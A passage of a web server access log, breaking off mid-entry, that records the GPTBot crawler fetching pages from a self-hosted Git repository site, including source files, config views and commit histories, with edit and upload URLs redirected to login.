[Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol" +[17/Feb/2026:16:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 10980] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:16:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 12785] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 13900] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 12775] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2finclude%2fsite%2fpython3.12" [Client 74.7.227.38] [Length 29189] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:16:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8505] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostcomplete&state=closed" +[17/Feb/2026:16:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastcomplete&state=all" [Client 74.7.227.38] [Length 8499] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastcomplete&state=open" +[17/Feb/2026:16:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 74.7.227.38] [Length 22141] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:16:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 74.7.227.38] [Length 22108] [Gzip 6.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:16:06:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:16:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/README.md" +[17/Feb/2026:16:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" [Client 74.7.227.38] [Length 11630] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" +[17/Feb/2026:16:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:16:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 12773] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py?display=source" [Client 74.7.227.38] [Length 13704] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py?display=source" [Client 74.7.227.38] [Length 13702] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:16:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj?display=source" [Client 74.7.227.38] [Length 11545] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10461] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10602] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:06:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/.TemporaryDocument" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:16:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/.TemporaryDocument" +[17/Feb/2026:16:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument" [Client 74.7.227.38] [Length 10186] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:16:06:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:16:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument" +[17/Feb/2026:16:06:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:16:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument" +[17/Feb/2026:16:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10601] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15355] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11204] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15355] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12791] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13521] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11204] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13523] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15355] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11392] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" +[17/Feb/2026:16:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11173] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13488] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13447] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:16:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16092] [Gzip 9.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16093] [Gzip 9.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" [Client 